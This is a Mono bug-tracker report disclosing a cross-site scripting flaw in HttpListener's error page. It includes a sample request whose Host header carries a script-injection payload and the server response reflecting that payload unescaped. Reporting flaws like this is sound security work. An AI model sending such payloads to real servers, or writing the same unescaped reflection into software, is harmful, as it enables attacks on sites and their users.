Bug 19238 - XSS in error page when host header is exploited
Summary: XSS in error page when host header is exploited
Status: NEW
Alias: None
Product: Class Libraries
Classification: Mono
Component: System (show other bugs)
Version: master
Hardware: All All
: --- normal
Target Milestone: Untriaged
Assignee: Bugzilla
Depends on:
Reported: 2014-04-23 05:01 UTC by protel
Modified: 2014-04-23 05:01 UTC (History)
1 user (show)

See Also:
Is this bug a regression?: ---
Last known good build:


Description protel 2014-04-23 05:01:25 UTC

During our PCI audit, our security tester found a XSS bug. It is possible to send a manipulated "Host" header that is printed to the resulting error page. This could be used to inject javascript into the page.

Here is an example of a manipulated request which has been handled by a HttpListener. I think the problem should be somewhere here: https://github.com/mono/mono/blob/a31c107f59298053e4ff17fd09b2fa617b75c1ba/mcs/class/System/System.Net/HttpListenerRequest.cs#L162 where the hostname validation is not sufficient.

GET /index.html HTTP/1.1
Host: "><script>alert(123)</script> 
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0

The response looks like this:

HTTP/1.1 400 Bad Request Content-Type: text/html; charset=utf-8 Server: Mono-HTTPAPI/1.0 Date: Thu, 17 Apr 2014 15:30:50 GMT Content-Length: 103 Connection: Close
<h1>Bad Request (Invalid url: http://"><script>alert(123)</script>:80/index.html)</h1>


Note You need to log in before you can comment on or make changes to this bug.